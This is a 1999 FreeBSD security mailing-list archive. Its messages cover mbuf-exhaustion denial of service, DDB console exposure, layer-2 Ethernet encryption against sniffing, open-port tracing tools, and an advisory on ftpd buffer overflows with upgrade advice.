Cc: freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2 Sep 1999, Dag-Erling Smorgrav wrote: > > If you have it set so that it does SUID for cgi and runs it as the user or > > uses the users accounting limits, it won't work.. and yes, you should set > > some sensible apache limits per user on that stuff, I know its possible. > > Apache's suEXEC wrapper doesn't enforce user limits. See ports/13606. > > DES > -- > Dag-Erling Smorgrav - des@flood.ping.uio.no > -- :{ andyf@speednet.com.au Andy Farkas System Administrator Speednet Communications http://www.speednet.com.au/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 7:58:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 774E915641; Tue, 7 Sep 1999 07:58:44 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id HAA20887; Tue, 7 Sep 1999 07:58:30 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id HAA02575; Tue, 7 Sep 1999 07:58:29 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id HAA00426; Tue, 7 Sep 1999 07:58:28 -0700 (PDT) From: Don Lewis Message-Id: <199909071458.HAA00426@salsa.gv.tsc.tdk.com> Date: Tue, 7 Sep 1999 07:58:28 -0700 In-Reply-To: Matthew Dillon "Re: mbuf shortage situations" (Sep 5, 9:18pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Matthew Dillon , Bosko Milekic Subject: Re: mbuf shortage situations Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sep 5, 9:18pm, Matthew Dillon wrote: } Subject: Re: mbuf shortage situations } : The only reason that I see for which we would actually panic() in } :this situation (as opposed to suffer the packet loss) is if we get to the } :point where we're losing packets because some script kid starts up } :something that will eat up sockbuf space and continuously fork, then we } :would lose all remote access to the machine in question (since all packets } :would be dropped) and we wouldn't really mind a panic() for obvious } :practical reasons. Well, I really would mind the panic(). } : In any case, I, personally, would prefer to suffer packet loss as } :opposed to a panic (especially now that Brian is in the process of writing } :diffs that will allow us to limit socket buffer space per UID through } :login.conf!) } : Having MGET store that null (e.g. fail as opposed to panic) on a } :M_WAIT seems fairly easy to fix, and would probably require some patching } :that would ensure that the packet loss is handeled relatively 'cleanly' } :(probably some debugging), but I wouldn't mind doing this. However, I'd } :like to know if there are objections to doing this or, in fact, if there } :are any suggestions on how to handle mbuf shortage situations (aside from } :just limiting -- although limiting is in itself a good solution and I'm } :glad that Brian F. is working on that). At least historically most of the panics have been caused by the code not properly checking the result of the MGET and dereferencing a NULL pointer. Any of those that are still in the code need to be fixed. My impression is that for reasonably recent versions of FreeBSD this attack doesn't panic the machine but just wedges the network system due to mbuf exhaustion. The problem is that if you get to this point you're basically hosed. It's OK to toss packets that you receive from the net as long as you haven't sent an ack for them, toss outgoing UDP packets, and block writes to stream sockets, but you can't toss acked TCP packets that you've received, or the data queued to a stream socket by write(). This particular attack does the latter, so the only possible fix is to prevent all the mbufs from being consumed by it in the first place. } The issue is basically having someone find the time to figure out } how to gracefully unwind various pieces of network code when an } mbuf cannot be allocated. Once that is done, the panic can be } turned into a (rate-limited) printf. That won't help. All that does is keep a root spinning on a failed syscall instead of blocking on MGET when he's trying to log in to kill the errant process. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 8:27:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id C95C214C28 for ; Tue, 7 Sep 1999 08:27:53 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1685 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 7 Sep 1999 10:21:58 -0500 (CDT) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Aug-7) Date: Tue, 7 Sep 1999 10:21:50 -0500 (CDT) From: James Wyatt To: David Miner Cc: dmp@aracnet.com, "Rodney W. Grimes" , ck@adsu.bellsouth.com, bryan@valiant.cis.hcc.cc.il.us, freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There are nice 10bT to fiber (fibre in the UK) converters in the BlackBox catalog (catalogue). You chould put these oh-so-close to the router or switch in the equipment space - maybe even braid the 10bT cables to confuse any listeners there. Then 10bF cards in the machines ensure no EMI emitted in the unsecure area. - Jy@ On Tue, 7 Sep 1999, David Miner wrote: > In regards to the other problem of EM from the UTP, have your uses given > thought to running the lines through shielded conduit. Are they running > TEMPEST tested boxes for the problem of radiation from the monitors? Is > each end in a shielded, grounded room? If they are that parinoid about a > sniffer from an authorized machine, they should be worried about the > radiation of unecrypted information after the data has been passed to the > destination machine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 8:59:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 5C88414D73; Tue, 7 Sep 1999 08:59:43 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id IAA81847; Tue, 7 Sep 1999 08:58:45 -0700 (PDT) (envelope-from dillon) Date: Tue, 7 Sep 1999 08:58:45 -0700 (PDT) From: Matthew Dillon Message-Id: <199909071558.IAA81847@apollo.backplane.com> To: Nick Hibma Cc: Greg Black , Dag-Erling Smorgrav , KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : > generated, DDB is the only way to figure out what is going on. : > securelevel is a mechanism which attempts to guarentee data security, : > at least to a degree. These two items do not clash. : > : :Anyway, as soon as you can physically access the PC, youD loose anyway, :independent of whether you can go into DDB to do things. You can reboot, :boot a floppy. Yes you can do something about those things, but only to :a limited extent. : :Nick I wasn't really thinking of the console-on-vty case. I was thinking of the console-on-serial-port case. When you have a rack of PC's you usually hang the console off a serial port and throw it into a portmaster or another machine w/ a multi-port card in it. There are two reasons for doing this. First in order to be able to log all messages sent to the console on a separate box, and second to be able to perform maintenance on the machines & deal with panics, lockups, and other situations for which DDB might be useful without having to haul the card with the video monitor and keyboard physically over to the machine. This also comes in useful when dealing with network attacks that make it impossible to log into a machine the normal way. But, unfortunately, putting the console on a serial port creates vulnerabilities when DDB is enabled. You are, essentially, creating an unintentional backdoor into the system. Hence the problem. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 9: 1:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from grogan.caprice.mb.ca (caprice.mb.ca [205.200.216.3]) by hub.freebsd.org (Postfix) with ESMTP id 4C40D15569 for ; Tue, 7 Sep 1999 09:01:15 -0700 (PDT) (envelope-from grub@grub.net) Received: from grub.net (home.grub.net [207.161.189.109]) by grogan.caprice.mb.ca (8.9.2/8.9.2) with ESMTP id JAA57230; Tue, 7 Sep 1999 09:36:27 -0500 (CDT) (envelope-from grub@grub.net) Message-ID: <37D38AB0.D4871A@grub.net> Date: Mon, 06 Sep 1999 09:34:40 +0000 From: grub Organization: GRUB.NET: "Purveyors of Fine Crud" X-Mailer: Mozilla 4.61 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: dmp@aracnet.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <37D4CA23.6A64FCAC@aracnet.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org dmp@aracnet.com wrote: [snip] > In order: > > A machine on the network can't see any other machine other that it's > firewall interface until the DC authorizes it's presence. > > Managed switches aren't used, we haven't found one that can provide > a high enough level of security. > > The server rooms already are locked. This is an interesting thread but I have a solution: "Sneaker Net" :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 9: 9:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id E2E6214D73; Tue, 7 Sep 1999 09:09:15 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id SAA30467; Tue, 7 Sep 1999 18:07:40 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Matthew Dillon Cc: Nick Hibma , Greg Black , Dag-Erling Smorgrav , KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel In-reply-to: Your message of "Tue, 07 Sep 1999 08:58:45 PDT." <199909071558.IAA81847@apollo.backplane.com> Date: Tue, 07 Sep 1999 18:07:40 +0200 Message-ID: <30465.936720460@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > But, unfortunately, putting the console on a serial port creates > vulnerabilities when DDB is enabled. You are, essentially, creating > an unintentional backdoor into the system. Hence the problem. ports/*/conserver is your friend! -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 9:22:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 316FD15634; Tue, 7 Sep 1999 09:22:23 -0700 (PDT) (envelope-from security-officer@freebsd.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id KAA40749; Tue, 7 Sep 1999 10:20:53 -0600 (MDT) (envelope-from security-officer@freebsd.org) Received: (from root@localhost) by harmony.village.org (8.9.3/8.8.3) id KAA13314; Tue, 7 Sep 1999 10:20:19 -0600 (MDT) Date: Tue, 7 Sep 1999 10:20:19 -0600 (MDT) Message-Id: <199909071620.KAA13314@harmony.village.org> From: FreeBSD Security Officer To: security-officer@freebsd.org Subject: FreeBSD Security Advisory: FreeBSD-SA-99:03.ftpd Reply-To: security-officer@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-99:03 Security Advisory FreeBSD, Inc. Topic: Two ftp daemons in ports vulnerable to attack. Category: ports Module: wu-ftpd and proftpd Announced: 1999-09-05 Affects: FreeBSD 3.2 (and earlier) FreeBSD-current before the correction date. Corrected: FreeBSD-3.3 RELEASE FreeBSD-current as of 1999/08/30 FreeBSD only: NO Patches: NONE I. Background wuftpd and proftpd have a flaw which can lead to a remote root compromise. They are both vulnerable since they are both based on a code base that is vulnerable. II. Problem Description Remote users can gain root via a buffer overflow. III. Impact Remote users can gain root. IV. Workaround Disable the ftp daemon until you can upgrade your system. V. Solution Upgrade your wu-ftpd or proftpd ports to the most recent versions (any version after August 30, 1999 is not impacted by this problem). If you are running non-port versions, you should verify that your version is not vulnerable or upgrade to using the ports version of these programs. ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org Security notifications: security-notifications@freebsd.org Security public discussion: freebsd-security@freebsd.org PGP Key: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBN9MsfFUuHi5z0oilAQHKYQP/SGjOSQ8Ph8VqLtpStVOl6L0ocoYKv59R B6ow00bchILYV7qlsIGFhwMITZxZH0aGd0EAxwfFKwfvu36zSzAvu1rGrFCjT5Xd zefzAQUgj1/rWm3Jp1DxMd2BKCJrvTCOjKngIbbA2tH3AZ9xHiwefpqtIHVPikmy XR9gpyqCj/E= =dyHS -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 12:28: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from metriclient-1.uoregon.edu (metriclient-1.uoregon.edu [128.223.172.1]) by hub.freebsd.org (Postfix) with ESMTP id DCF84155FD for ; Tue, 7 Sep 1999 12:27:57 -0700 (PDT) (envelope-from gurney_j@efn.org) Received: (from jmg@localhost) by metriclient-1.uoregon.edu (8.9.1/8.8.7) id MAA10951; Tue, 7 Sep 1999 12:26:21 -0700 (PDT) Message-ID: <19990907122621.30662@hydrogen.fircrest.net> Date: Tue, 7 Sep 1999 12:26:21 -0700 From: John-Mark Gurney To: Sheldon Hearn Cc: sthaug@nethelp.no, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD References: <36622.936445305@verdi.nethelp.no> <28018.936617908@axl.noc.iafrica.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.69 In-Reply-To: <28018.936617908@axl.noc.iafrica.com>; from Sheldon Hearn on Mon, Sep 06, 1999 at 01:38:28PM +0200 Reply-To: John-Mark Gurney Organization: Cu Networking X-Operating-System: FreeBSD 3.0-RELEASE i386 X-PGP-Fingerprint: B7 EC EF F8 AE ED A7 31 96 7A 22 B3 D8 56 36 F4 X-Files: The truth is out there X-URL: http://resnet.uoregon.edu/~gurney_j/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sheldon Hearn scribbled this message on Sep 6: > On Sat, 04 Sep 1999 13:41:45 +0200, sthaug@nethelp.no wrote: > > > You're probably using ssh with X11 forwarding. If you use the > > 'sockstat' program you'll find that sshd is listening to those ports. > > This is the third time I've seen someone try to use netstat to figure > out who's listening to what. Do you think an xref to sockstat would be > completely inappropriate in the netstat(1) manpage? no, but we should include a reference to fstat... you can track down who had a udp socket open, but for some reason the addresses on my 3.0-R box for tcp streams outputed by netstat don't agree w/ any of the addresses that exist in the fstat output... looks like I should extend the description of -A to include a blurb about identifing processes which own a socket/stream... -- John-Mark Gurney Voice: +1 541 684 8449 Cu Networking P.O. Box 5693, 97405 "The soul contains in itself the event that shall presently befall it. The event is only the actualizing of its thought." -- Ralph Waldo Emerson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 12:42:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from charlotte.geac.com (charlotte.geac.com [208.144.226.130]) by hub.freebsd.org (Postfix) with SMTP id 05E1114CF5 for ; Tue, 7 Sep 1999 12:42:38 -0700 (PDT) (envelope-from n.spence@geac.com) Received: (qmail 138 invoked from network); 7 Sep 1999 19:38:33 -0000 Received: from aramis.geac.com (HELO b21bis.clsi.us.geac.com) (208.144.226.1) by charlotte.geac.com with SMTP; 7 Sep 1999 19:38:33 -0000 Received: (qmail 15105 invoked from network); 7 Sep 1999 19:38:26 -0000 Received: from exchange.eci.us.geac.com (HELO ilpostino.eci.us.geac.com) (192.168.70.13) by b21bis.us.geac.com with SMTP; 7 Sep 1999 19:38:26 -0000 Received: by exchange.eci.us.geac.com with Internet Mail Service (5.5.1960.3) id ; Tue, 7 Sep 1999 12:41:02 -0700 Message-ID: <85D42D7EE2DAD2119CD400A0C9E1004F64F69A@exchange.eci.us.geac.com> From: =?utf-8?B?Tmlrb2xhdXMgU3BlbmNl?= To: =?utf-8?B?J2RtcEBhcmFjbmV0LmNvbSc=?= Cc: freebsd-security@freebsd.org Subject: =?utf-8?B?UkU6IExheWVyIDIgZXRoZXJuZXQgZW5jcnlwdGlvbj8=?= Date: Tue, 7 Sep 1999 12:41:01 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.1960.3) Content-Type: text/plain; charset="utf-8" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you aren't using IP based routing then aren't your packets going to be encapsulated already? how ARE you routing your packets??? Nikolaus -----Original Message----- From: dmp@aracnet.com [mailto:dmp@aracnet.com] Sent: Monday, September 06, 1999 11:06 PM To: Gary Palmer Cc: freebsd-security@freebsd.org Subject: Re: Layer 2 ethernet encryption? Gary Palmer wrote: > > dmp@aracnet.com wrote in message ID > <37D496A5.A0576E0F@aracnet.com>: > > Is it possible to encrypt ethernet packets so that all layers above > > layer 2 would be encrypted? The idea I had was to make a device that > > could defeat a TCP sniffer by encrypting the IP headers. Is this > > doable? Viable? A reinvention of the wheel? > > How would you route the traffic? No routers would be able to pass the > traffic. The network in question doesn't use IP-based routing. > If you are doing this for a local LAN, I suggest you have bigger > problems :) You're right, I do have bigger problems. Like deep paranoia among the users of the LAN. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 12:43:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from charlotte.geac.com (charlotte.geac.com [208.144.226.130]) by hub.freebsd.org (Postfix) with SMTP id 7C423154FD for ; Tue, 7 Sep 1999 12:43:25 -0700 (PDT) (envelope-from n.spence@geac.com) Received: (qmail 138 invoked from network); 7 Sep 1999 19:38:33 -0000 Received: from aramis.geac.com (HELO b21bis.clsi.us.geac.com) (208.144.226.1) by charlotte.geac.com with SMTP; 7 Sep 1999 19:38:33 -0000 Received: (qmail 15105 invoked from network); 7 Sep 1999 19:38:26 -0000 Received: from exchange.eci.us.geac.com (HELO ilpostino.eci.us.geac.com) (192.168.70.13) by b21bis.us.geac.com with SMTP; 7 Sep 1999 19:38:26 -0000 Received: by exchange.eci.us.geac.com with Internet Mail Service (5.5.1960.3) id ; Tue, 7 Sep 1999 12:41:02 -0700 Message-ID: <85D42D7EE2DAD2119CD400A0C9E1004F64F69A@exchange.eci.us.geac.com> From: =?utf-8?B?Tmlrb2xhdXMgU3BlbmNl?= To: =?utf-8?B?J2RtcEBhcmFjbmV0LmNvbSc=?= Cc: freebsd-security@freebsd.org Subject: =?utf-8?B?UkU6IExheWVyIDIgZXRoZXJuZXQgZW5jcnlwdGlvbj8=?= Date: Tue, 7 Sep 1999 12:41:01 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.1960.3) Content-Type: text/plain; charset="utf-8" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you aren't using IP based routing then aren't your packets going to be encapsulated already? how ARE you routing your packets??? Nikolaus -----Original Message----- From: dmp@aracnet.com [mailto:dmp@aracnet.com] Sent: Monday, September 06, 1999 11:06 PM To: Gary Palmer Cc: freebsd-security@freebsd.org Subject: Re: Layer 2 ethernet encryption? Gary Palmer wrote: > > dmp@aracnet.com wrote in message ID > <37D496A5.A0576E0F@aracnet.com>: > > Is it possible to encrypt ethernet packets so that all layers above > > layer 2 would be encrypted? The idea I had was to make a device that > > could defeat a TCP sniffer by encrypting the IP headers. Is this > > doable? Viable? A reinvention of the wheel? > > How would you route the traffic? No routers would be able to pass the > traffic. The network in question doesn't use IP-based routing. > If you are doing this for a local LAN, I suggest you have bigger > problems :) You're right, I do have bigger problems. Like deep paranoia among the users of the LAN. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 19:21: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from mta2.snfc21.pbi.net (mta2.snfc21.pbi.net [206.13.28.123]) by hub.freebsd.org (Postfix) with ESMTP id 4308714EE6 for ; Tue, 7 Sep 1999 19:21:00 -0700 (PDT) (envelope-from madscientist@thegrid.net) Received: from remus (adsl-63-193-246-169.dsl.snfc21.pacbell.net [63.193.246.169]) by mta2.snfc21.pbi.net (8.9.3/8.9.3) with SMTP id TAA29356; Tue, 7 Sep 1999 19:18:40 -0700 (PDT) Message-Id: <4.1.19990907190442.0096ada0@mail.thegrid.net> X-Sender: i289861@mail.thegrid.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Tue, 07 Sep 1999 19:19:14 -0700 To: dmp@aracnet.com, ks@itp.ac.ru From: The Mad Scientist Subject: Re: Layer 2 ethernet encryption? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <37D4BCC2.34AFAE9D@aracnet.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:20 AM 9/7/99 -0700, dmp@aracnet.com wrote: >"Sergey S. Kosyakov" wrote: >> On 07-Sep-99 dmp@aracnet.com wrote: >>> "Sergey S. Kosyakov" wrote: >>>> On 07-Sep-99 dmp@aracnet.com wrote: >I have two problems. The first is that EM emissions on UTP allows >one to monitor all traffic on that cable. The second is that a >sniffer run on an authorized machine will be able to see the source >and destination IP and port of all IP traffic on it's segment. > >I want to fix both problems. Encrypting everything above layer 2 >does this. The only determinable aspects of the packets would be >the source and destination MAC addresses, relatively sufficient >security given the security policy and topology of the network in >question. I do not claim to understand driver writing, but what about ripping out the code that puts the NIC into promiscous mode? You would have to modify the code that allows the driver to change its MAC address, probably. But if you have good network monitors, you should be able to detect a machine that is pretending to be someone else pretty quickly. It's not encryption, but if you're blind, you can't read the written word. It doesn't solve your EM problems either. 'Course, I guess any user with half a brain could go out and get the original driver and put it in place -- this being an open source solution. So, I guess it's not such a good idea after all. I'll send this anyway, in case it starts people thinking. Please redirect flames to /dev/null. Dean To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 23:34:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 2CB5915A8D for ; Tue, 7 Sep 1999 23:34:37 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id XAA04854; Tue, 7 Sep 1999 23:31:18 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D60350.6E85A7A1@aracnet.com> Date: Tue, 07 Sep 1999 23:33:52 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Garrett Wollman Cc: ks@itp.ac.ru, freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <37D4BCC2.34AFAE9D@aracnet.com> <199909071339.JAA11485@khavrinen.lcs.mit.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Garrett Wollman wrote: > <> I have two problems. The first is that EM emissions on UTP allows >> one to monitor all traffic on that cable. > > Use fiber NICs. Short of winning a significant lottery, it would be economically impossible to move the network to fibre, there's too many nodes to upgrade. >> The second is that a >> sniffer run on an authorized machine will be able to see the source >> and destination IP and port of all IP traffic on it's segment. > > Use a good switch and hard-wire the bridge table. The network currently can't be segmented any more than it is without breaking it's applications. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 23:47:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id A085914FF9 for ; Tue, 7 Sep 1999 23:47:02 -0700 (PDT) (envelope-from ks@chg.ru) Received: from speecart.chg.ru (speecart.chg.ru [193.233.46.2]) by netserv1.chg.ru (8.9.3/8.9.1) with ESMTP id KAA45640; Wed, 8 Sep 1999 10:44:19 +0400 (MSD) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <37D60350.6E85A7A1@aracnet.com> Date: Wed, 08 Sep 1999 10:41:47 +0400 (MSD) Organization: Landau Institute for Theoretical Physics From: "Sergey S. Kosyakov" To: dmp@aracnet.com Subject: Re: Layer 2 ethernet encryption? Cc: freebsd-security@FreeBSD.ORG Cc: freebsd-security@FreeBSD.ORG, Garrett Wollman Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 08-Sep-99 dmp@aracnet.com wrote: > Garrett Wollman wrote: >> <>> I have two problems. The first is that EM emissions on UTP allows >>> one to monitor all traffic on that cable. >> >> Use fiber NICs. > > Short of winning a significant lottery, it would be economically > impossible to move the network to fibre, there's too many nodes to > upgrade. Security was always expensive :-) More security, more expensies. >>> The second is that a >>> sniffer run on an authorized machine will be able to see the source >>> and destination IP and port of all IP traffic on it's segment. >> >> Use a good switch and hard-wire the bridge table. > > The network currently can't be segmented any more than it is without > breaking it's applications. 1. I don't undestand. What do you mean "breaking it's applications". 2. Do you thing about huge CPUs load on each host in the case of "too many nodes"? In the case of layer2 encryption each host must decrypt each packet in the segment, or at least each packet header. --- ---------------------------------- Sergey Kosyakov Laboratory of Distributed Computing Department of High-Performance Computing and Applied Network Research Landau Institute for Theoretical Physics E-Mail: ks@chg.ru Date: 08-Sep-99 Time: 10:36:35 ---------------------------------- --- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 0:50:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 5F024154A3 for ; Wed, 8 Sep 1999 00:50:13 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id JAA31928; Wed, 8 Sep 1999 09:49:25 +0200 (CEST) (envelope-from des) To: John-Mark Gurney Cc: Sheldon Hearn , sthaug@nethelp.no, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD References: <36622.936445305@verdi.nethelp.no> <28018.936617908@axl.noc.iafrica.com> <19990907122621.30662@hydrogen.fircrest.net> From: Dag-Erling Smorgrav Date: 08 Sep 1999 09:49:24 +0200 In-Reply-To: John-Mark Gurney's message of "Tue, 7 Sep 1999 12:26:21 -0700" Message-ID: Lines: 17 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org John-Mark Gurney writes: > no, but we should include a reference to fstat... you can track down > who had a udp socket open, but for some reason the addresses on my 3.0-R > box for tcp streams outputed by netstat don't agree w/ any of the > addresses that exist in the fstat output... I fixed that bug a long time ago. What are you doing still running 3.0-R, anyway? > looks like I should extend the description of -A to include a blurb > about identifing processes which own a socket/stream... Why? What's wrong with sockstat? DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 1: 4: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 2FDFA15084 for ; Wed, 8 Sep 1999 01:04:05 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA11486; Wed, 8 Sep 1999 01:00:38 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D61842.663D324A@aracnet.com> Date: Wed, 08 Sep 1999 01:03:14 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: grub Cc: freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <37D4CA23.6A64FCAC@aracnet.com> <37D38AB0.D4871A@grub.net> 